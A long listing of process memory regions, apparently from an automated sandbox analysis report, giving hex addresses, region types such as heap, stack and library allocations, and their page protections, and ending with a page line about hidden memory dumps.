page read and write
7FFD9A620000
trusted library allocation
page read and write
7FFD9A3C0000
trusted library allocation
page execute and read and write
21FEF40B000
heap
page read and write
1B6D729F000
heap
page read and write
7FFD9A4A0000
trusted library allocation
page read and write
A03AD3D000
stack
page read and write
1B6D72A7000
heap
page read and write
124A8000
trusted library allocation
page read and write
1D6C9F3F000
trusted library allocation
page read and write
7FFD9A5E4000
trusted library allocation
page read and write
21FF135F000
heap
page read and write
22735214000
heap
page read and write
42FFEBE000
stack
page read and write
7FFD9A4E0000
trusted library allocation
page read and write
1D6C9B17000
trusted library allocation
page read and write
7FFD9A520000
trusted library allocation
page read and write
21F80F72000
trusted library allocation
page read and write
A03AAB6000
stack
page read and write
7FFD9A47A000
trusted library allocation
page read and write
7FFD9A628000
trusted library allocation
page read and write
7FFD9A706000
trusted library allocation
page read and write
1B6D6C86000
heap
page read and write
7FFD9A478000
trusted library allocation
page read and write
227351FE000
heap
page read and write
7FFD9A630000
trusted library allocation
page read and write
1D6E13F6000
heap
page read and write
2B1F000
trusted library allocation
page read and write
1B6BF875000
trusted library allocation
page read and write
1D6E1390000
heap
page read and write
7FFD9A690000
trusted library allocation
page read and write
7FFD9A5F4000
trusted library allocation
page read and write
7FFD9A4F0000
trusted library allocation
page read and write
1D6C74C0000
trusted library section
page read and write
1D6E13F8000
heap
page read and write
7FFD9A360000
trusted library allocation
page read and write
1D6C920C000
trusted library allocation
page read and write
1B4E5000
stack
page read and write
22735221000
heap
page read and write
A03A3D3000
stack
page read and write
7FFD9A610000
trusted library allocation
page read and write
124A1000
trusted library allocation
page read and write
1C0FE000
stack
page read and write
29A1000
trusted library allocation
page read and write
A03A9F9000
stack
page read and write
1B6BCCB0000
heap
page read and write
1D6E139A000
heap
page read and write
2272CC0A000
trusted library allocation
page read and write
A20000
heap
page read and write
1B957000
heap
page read and write
DE0000
heap
page read and write
1B6D72A3000
heap
page read and write
7FFD9A31C000
trusted library allocation
page execute and read and write
1D6CA2D7000
trusted library allocation
page read and write
21FF0DE0000
heap
page execute and read and write
7FFD9A550000
trusted library allocation
page read and write
1C1AE000
stack
page read and write
428027B000
stack
page read and write
1D6C9B0F000
trusted library allocation
page read and write
7FFD9A3B0000
trusted library allocation
page execute and read and write
2271ADD0000
heap
page read and write
7FFD9A4E0000
trusted library allocation
page read and write
7FFD9A490000
trusted library allocation
page execute and read and write
21F8186C000
trusted library allocation
page read and write
7FFD9A3D0000
trusted library allocation
page execute and read and write
1B6D7289000
heap
page read and write
2271D987000
trusted library allocation
page read and write
1C1FE000
stack
page read and write
1D6CA865000
trusted library allocation
page read and write
1A9D0000
trusted library allocation
page read and write
7FFD9A2BD000
trusted library allocation
page execute and read and write
21FF166A000
heap
page read and write
2300000
heap
page execute and read and write
5DBB13E000
stack
page read and write
1A91C000
stack
page read and write
7FFD9A590000
trusted library allocation
page read and write
7FFD9A460000
trusted library allocation
page read and write
21F80F6E000
trusted library allocation
page read and write
2272CC0E000
trusted library allocation
page read and write
1C2D1000
heap
page read and write
1CF4C000
stack
page read and write
1B6BCF80000
heap
page read and write
7FFD9A480000
trusted library allocation
page execute and read and write
7FFD9A550000
trusted library allocation
page read and write
1D6C8EE0000
heap
page execute and read and write
7FFD9A6BC000
trusted library allocation
page read and write
7FFD9A294000
trusted library allocation
page read and write
7FFD9A2E0000
trusted library allocation
page read and write
1B6D6EEA000
heap
page read and write
42801FF000
stack
page read and write
1D6C9BD1000
trusted library allocation
page read and write
438000
heap
page read and write
21F81892000
trusted library allocation
page read and write
7FFD9A482000
trusted library allocation
page read and write
7FFD9A45A000
trusted library allocation
page read and write
1D6E16BB000
heap
page read and write
1C7D0000
heap
page read and write
1B6D72AF000
heap
page read and write
1D6E16CB000
heap
page read and write
2273513E000
heap
page read and write
7FFD9A29D000
trusted library allocation
page execute and read and write
2271D59D000
trusted library allocation
page read and write
D43000
heap
page execute and read and write
21FF172E000
heap
page read and write
21FF0EF5000
heap
page read and write
1B6D6E5F000
heap
page read and write
7FFD9A29D000
trusted library allocation
page execute and read and write
1B6BFFBB000
trusted library allocation
page read and write
22735225000
heap
page read and write
7FFD9A4C0000
trusted library allocation
page read and write
7FFD9A6A0000
trusted library allocation
page read and write
1D6C7247000
heap
page read and write
2271E746000
trusted library allocation
page read and write
1C7F9000
heap
page read and write
7FFD9A494000
trusted library allocation
page read and write
7DF46D160000
trusted library allocation
page execute and read and write
7DF4162A0000
trusted library allocation
page execute and read and write
7FFD9A2C0000
trusted library allocation
page read and write
12411000
trusted library allocation
page read and write
7FFD9A580000
trusted library allocation
page read and write
A03A97D000
stack
page read and write
1D6C7350000
heap
page read and write
802000
heap
page read and write
A26000
heap
page read and write
2271B1C0000
trusted library section
page read and write
7FFD9A4E0000
trusted library allocation
page read and write
22E0000
trusted library allocation
page read and write
7DF000
stack
page read and write
21F804CD000
trusted library allocation
page read and write
7FFD9A451000
trusted library allocation
page read and write
22735177000
heap
page read and write
1C7D4000
heap
page read and write
1B6BCD29000
heap
page read and write
1010000
heap
page read and write
BF08379000
stack
page read and write
21F81311000
trusted library allocation
page read and write
7FFD9A61C000
trusted library allocation
page read and write
2271D9BB000
trusted library allocation
page read and write
1D6E1590000
heap
page read and write
21FF136F000
heap
page read and write
7FFD9A34C000
trusted library allocation
page execute and read and write
7FFD9A2BB000
trusted library allocation
page read and write
1D6C9238000
trusted library allocation
page read and write
7FFD9A36C000
trusted library allocation
page execute and read and write
677000
heap
page read and write
1B6CEA43000
trusted library allocation
page read and write
7FFD9A630000
trusted library allocation
page read and write
1C2FD000
heap
page read and write
7FFD9A498000
trusted library allocation
page read and write
1B6BCCE8000
heap
page read and write
5A0000
heap
page read and write
1B6C052F000
trusted library allocation
page read and write
1D6C9C8B000
trusted library allocation
page read and write
7FFD9A4E0000
trusted library allocation
page read and write
2271B1D5000
heap
page read and write
1D6CA698000
trusted library allocation
page read and write
1A88D000
stack
page read and write
7FFD9A4A2000
trusted library allocation
page read and write
7FFD9A5F0000
trusted library allocation
page read and write
7FFD9A350000
trusted library allocation
page execute and read and write
1D6C93DD000
trusted library allocation
page read and write
2A80000
trusted library allocation
page read and write
21F818F5000
trusted library allocation
page read and write
641000
heap
page read and write
7FFD9A6E6000
trusted library allocation
page read and write
7FFD9A5A0000
trusted library allocation
page read and write
1B6BCCF2000
heap
page read and write
1D6CA21C000
trusted library allocation
page read and write
1C2B0000
heap
page read and write
2271AF3D000
heap
page read and write
2271DCED000
trusted library allocation
page read and write
1B6CE7C3000
trusted library allocation
page read and write
1B6BF507000
trusted library allocation
page read and write
2272C951000
trusted library allocation
page read and write
1D6E170D000
heap
page read and write
1D6CA1E8000
trusted library allocation
page read and write
21F81127000
trusted library allocation
page read and write
1D6C8CB0000
heap
page readonly
646000
heap
page read and write
7FFD9A442000
trusted library allocation
page read and write
1D6E15DE000
heap
page read and write
7FFD9A461000
trusted library allocation
page read and write
7FFD9A5A0000
trusted library allocation
page read and write
7FFD9A5C0000
trusted library allocation
page read and write
7FFD9A3A6000
trusted library allocation
page execute and read and write
2271E74B000
trusted library allocation
page read and write
A03AB39000
stack
page read and write
1D6CAD3C000
trusted library allocation
page read and write
7FFD9A440000
trusted library allocation
page read and write
1D6E1657000
heap
page read and write
21FF1740000
heap
page read and write
1B6CE751000
trusted library allocation
page read and write
7FFD9A3A6000
trusted library allocation
page execute and read and write
7FFD9A2A3000
trusted library allocation
page read and write
2272CC18000
trusted library allocation
page read and write
63E000
heap
page read and write
7FFD9A580000
trusted library allocation
page read and write
21F90031000
trusted library allocation
page read and write
7FFD9A5C0000
trusted library allocation
page read and write
7FFD9A5F2000
trusted library allocation
page read and write
7FFD9A6A0000
trusted library allocation
page read and write
1D6C8CA0000
trusted library allocation
page read and write
22C0000
trusted library allocation
page read and write
21FF0EF0000
heap
page read and write
7FFD9A5D0000
trusted library allocation
page read and write
7FFD9A46A000
trusted library allocation
page read and write
7FFD9A6B0000
trusted library allocation
page read and write
7FFD9A450000
trusted library allocation
page execute and read and write
21FEF4BD000
heap
page read and write
A03AE3B000
stack
page read and write
5DBA8D3000
stack
page read and write
1B6BFA8D000
trusted library allocation
page read and write
7FFD9A6F0000
trusted library allocation
page read and write
1D6C727C000
heap
page read and write
7FFD9A2D4000
trusted library allocation
page read and write
7FFD9A370000
trusted library allocation
page read and write
21F81E2A000
trusted library allocation
page read and write
A03ACBE000
stack
page read and write
1B6D7213000
heap
page read and write
21FF178F000
heap
page read and write
21FF17B7000
heap
page read and write
500000
heap
page read and write
21FF1694000
heap
page read and write
1B6CE771000
trusted library allocation
page read and write
2273522E000
heap
page read and write
21FEF448000
heap
page read and write
21FF0DA0000
trusted library allocation
page read and write
42FFA73000
stack
page read and write
1B6D72AB000
heap
page read and write
21FF1960000
heap
page read and write
21FF165A000
heap
page read and write
7FFD9A614000
trusted library allocation
page read and write
BF08579000
stack
page read and write
A93000
heap
page read and write
A03ABB7000
stack
page read and write
22734EE6000
heap
page read and write
1D6CA77D000
trusted library allocation
page read and write
21FEF3FE000
heap
page read and write
1C334000
heap
page read and write
1B6D72D9000
heap
page read and write
2271DB78000
trusted library allocation
page read and write
5DBACFA000
stack
page read and write
1D6C7283000
heap
page read and write
9FE000
stack
page read and write
7FFD9A520000
trusted library allocation
page read and write
7FFD9A700000
trusted library allocation
page read and write
7FFD9A492000
trusted library allocation
page read and write
62D000
heap
page read and write
7FFD9A2BD000
trusted library allocation
page execute and read and write
7FFD9A2C4000
trusted library allocation
page read and write
1D6C9F14000
trusted library allocation
page read and write
22734EA0000
heap
page read and write
22734E90000
heap
page execute and read and write
7FFD9A4A4000
trusted library allocation
page read and write
12413000
trusted library allocation
page read and write
2271D694000
trusted library allocation
page read and write
21FF139D000
heap
page read and write
7FFD9A2B0000
trusted library allocation
page read and write
21F811E1000
trusted library allocation
page read and write
7FFD9A2DD000
trusted library allocation
page execute and read and write
7FFD9A6ED000
trusted library allocation
page read and write
2271D92A000
trusted library allocation
page read and write
7FFD9A480000
trusted library allocation
page execute and read and write
1D6CA123000
trusted library allocation
page read and write
D00000
trusted library allocation
page read and write
1B6BCD3B000
heap
page read and write
1B6D6D70000
heap
page read and write
1D6C9FA5000
trusted library allocation
page read and write
625000
heap
page read and write
7FFD9A430000
trusted library allocation
page read and write
7FFD9A560000
trusted library allocation
page read and write
2271E216000
trusted library allocation
page read and write
22F0000
heap
page read and write
A03B88D000
stack
page read and write
1B6D6DB3000
heap
page read and write
7FFD9A450000
trusted library allocation
page execute and read and write
42FFDFD000
stack
page read and write
21F902F3000
trusted library allocation
page read and write
1D6C7450000
heap
page read and write
7FFD9A292000
trusted library allocation
page read and write
7FFD9A4C0000
trusted library allocation
page read and write
7FFD9A380000
trusted library allocation
page execute and read and write
1D6E168C000
heap
page read and write
7DF49F140000
trusted library allocation
page execute and read and write
702000
heap
page read and write
1B6D6EC4000
heap
page read and write
440000
heap
page read and write
1D6E15E7000
heap
page read and write
A03A7F9000
stack
page read and write
7FFD9A6C0000
trusted library allocation
page execute and read and write
7FFD9A432000
trusted library allocation
page read and write
7DF4162B0000
trusted library allocation
page execute and read and write
2271CB49000
trusted library allocation
page read and write
400000
heap
page read and write
1B6BE979000
trusted library allocation
page read and write
21FF16F1000
heap
page read and write
7FFD9A3B0000
trusted library allocation
page execute and read and write
7FFD9A6F0000
trusted library allocation
page read and write
1B6C0554000
trusted library allocation
page read and write
7FFD9A510000
trusted library allocation
page read and write
990000
heap
page read and write
7FFD9A500000
trusted library allocation
page read and write
1D6CA1B8000
trusted library allocation
page read and write
550000
trusted library allocation
page read and write
1AD5F000
stack
page read and write
A02000
heap
page read and write
A03B909000
stack
page read and write
7FFD9A31C000
trusted library allocation
page execute and read and write
21F811AF000
trusted library allocation
page read and write
1B6BCDD3000
heap
page read and write
510000
heap
page read and write
BF085F8000
stack
page read and write
413000
heap
page read and write
1B6BE6B0000
heap
page execute and read and write
BF086FE000
stack
page read and write
1B6BF1A2000
trusted library allocation
page read and write
1D6E15A3000
heap
page read and write
21FF1830000
trusted library allocation
page read and write
D40000
heap
page execute and read and write
400000
heap
page read and write
1D6E16CD000
heap
page read and write
7FFD9A540000
trusted library allocation
page read and write
1D6C8D30000
trusted library allocation
page read and write
1D6E1448000
heap
page read and write
451000
heap
page read and write
7FFD9A294000
trusted library allocation
page read and write
BF0827A000
stack
page read and write
7FFD9A432000
trusted library allocation
page read and write
29FF000
trusted library allocation
page read and write
7FFD9A2C2000
trusted library allocation
page read and write
7FFD9A460000
trusted library allocation
page execute and read and write
1B6BE660000
trusted library allocation
page read and write
7DF4726F0000
trusted library allocation
page execute and read and write
960000
heap
page read and write
1B2B0000
heap
page read and write
5DBB03A000
stack
page read and write
2271C7F0000
trusted library section
page read and write
7FFD9A60C000
trusted library allocation
page read and write
7FFD9A3E0000
trusted library allocation
page execute and read and write
7FFD9A293000
trusted library allocation
page execute and read and write
7FFD9A530000
trusted library allocation
page read and write
21FF1500000
heap
page read and write
1B6D6D97000
heap
page read and write
1B6D6ECB000
heap
page read and write
1B3EE000
stack
page read and write
21F902EC000
trusted library allocation
page read and write
21FF1662000
heap
page read and write
21F80229000
trusted library allocation
page read and write
2B23000
trusted library allocation
page read and write
7FFD9A618000
trusted library allocation
page read and write
600000
heap
page read and write
1D6C9E05000
trusted library allocation
page read and write
7FFD9A6C0000
trusted library allocation
page read and write
7FFD9A6D0000
trusted library allocation
page read and write
1D6C8F11000
trusted library allocation
page read and write
2271D519000
trusted library allocation
page read and write
7FFD9A620000
trusted library allocation
page read and write
1B5EE000
stack
page read and write
7FFD9A500000
trusted library allocation
page read and write
21F902F1000
trusted library allocation
page read and write
1B6BCC90000
heap
page read and write
1D6CA24F000
trusted library allocation
page read and write
1015000
heap
page read and write
2271DA4B000
trusted library allocation
page read and write
2271AF84000
heap
page read and write
1C7E3000
heap
page read and write
7FFD9A5AF000
trusted library allocation
page read and write
7FFD9A2B0000
trusted library allocation
page read and write
7FFD9A6B0000
trusted library allocation
page read and write
CF0000
trusted library allocation
page read and write
21FF1633000
heap
page read and write
21FEF3DF000
heap
page read and write
5DBBE8C000
stack
page read and write
63C000
heap
page read and write
7FFD9A2B2000
trusted library allocation
page read and write
21F80F76000
trusted library allocation
page read and write
1B6D71F3000
heap
page read and write
7FFD9A560000
trusted library allocation
page read and write
2271D955000
trusted library allocation
page read and write
7FFD9A460000
trusted library allocation
page execute and read and write
7FFD9A610000
trusted library allocation
page read and write
2271DB03000
trusted library allocation
page read and write
2271D8F1000
trusted library allocation
page read and write
7FFD9A346000
trusted library allocation
page read and write
7FFD9A5A0000
trusted library allocation
page read and write
A03A8F7000
stack
page read and write
2271AF89000
heap
page read and write
1D6C72C9000
heap
page read and write
7FFD9A720000
trusted library allocation
page read and write
BF08479000
stack
page read and write
22735238000
heap
page read and write
1D6C8CF0000
trusted library allocation
page read and write
2AC4000
trusted library allocation
page read and write
2273499B000
heap
page read and write
7FFD9A376000
trusted library allocation
page execute and read and write
7FFD9A4D0000
trusted library allocation
page read and write
1D6C8D70000
heap
page execute and read and write
7FFD9A640000
trusted library allocation
page read and write
A03AA3E000
stack
page read and write
2271AF08000
heap
page read and write
1B6BF813000
trusted library allocation
page read and write
1D080000
trusted library allocation
page read and write
21FF1415000
heap
page read and write
241C000
trusted library allocation
page read and write
21F80F7A000
trusted library allocation
page read and write
2271E0A7000
trusted library allocation
page read and write
2AF4000
trusted library allocation
page read and write
1C1000
stack
page read and write
249E000
stack
page read and write
1B6BEC1D000
trusted library allocation
page read and write
7FFD9A370000
trusted library allocation
page read and write
7FFD9A5F9000
trusted library allocation
page read and write
21F902FB000
trusted library allocation
page read and write
1C2FF000
stack
page read and write
1B6BE740000
heap
page read and write
B02000
heap
page read and write
1B6BCD23000
heap
page read and write
477000
heap
page read and write
21FEF765000
heap
page read and write
227351D9000
heap
page read and write
1C314000
heap
page read and write
5DBAD7E000
stack
page read and write
1D6E160C000
heap
page read and write
1D6C74D0000
trusted library allocation
page read and write
7FFD9A520000
trusted library allocation
page read and write
7FFD9A340000
trusted library allocation
page read and write
1D6E1800000
heap
page read and write
1B6D721D000
heap
page read and write
227351BF000
heap
page read and write
1CE4D000
stack
page read and write
7FFD9A600000
trusted library allocation
page read and write
BF0944C000
stack
page read and write
21FEF330000
heap
page read and write
BF083FD000
stack
page read and write
240E000
stack
page read and write
7FFD9A340000
trusted library allocation
page read and write
1ABD0000
heap
page read and write
22734F60000
heap
page read and write
7FFD9A500000
trusted library allocation
page read and write
7FFD9A470000
trusted library allocation
page execute and read and write
7FFD9A30C000
trusted library allocation
page execute and read and write
5DBBD8E000
stack
page read and write
1D6D921A000
trusted library allocation
page read and write
1B6D6756000
heap
page read and write
7FFD9A590000
trusted library allocation
page read and write
1B964000
heap
page read and write
21F81786000
trusted library allocation
page read and write
1C9CE000
stack
page read and write
7FFD9A4B0000
trusted library allocation
page read and write
1BCB0000
heap
page read and write
6D0000
heap
page read and write
A8F000
heap
page read and write
24AD000
trusted library allocation
page read and write
1D6C9FD1000
trusted library allocation
page read and write
7FFD9A602000
trusted library allocation
page read and write
7FFD9A70D000
trusted library allocation
page read and write
42800FF000
stack
page read and write
22734F9D000
heap
page read and write
AFF000
stack
page read and write
1B6D72B3000
heap
page read and write
7DF49F150000
trusted library allocation
page execute and read and write
2271D8ED000
trusted library allocation
page read and write
2271B1A0000
heap
page read and write
2271C840000
trusted library allocation
page read and write
6C2000
heap
page read and write
1D6C7265000
heap
page read and write
BF084F6000
stack
page read and write
7FFD9A6E0000
trusted library allocation
page read and write
1B6D729B000
heap
page read and write
1B6D6D50000
heap
page execute and read and write
590000
heap
page execute and read and write
21FF166E000
heap
page read and write
1B6BCBB0000
heap
page read and write
5DBAC7E000
stack
page read and write
7FFD9A540000
trusted library allocation
page read and write
7FFD9A6F0000
trusted library allocation
page execute and read and write
1B6D6C60000
heap
page read and write
22734E70000
heap
page execute and read and write
7FFD9A4D0000
trusted library allocation
page read and write
2271C820000
trusted library allocation
page read and write
1D6C72C6000
heap
page read and write
There are 1037 hidden memdumps, click here to show them.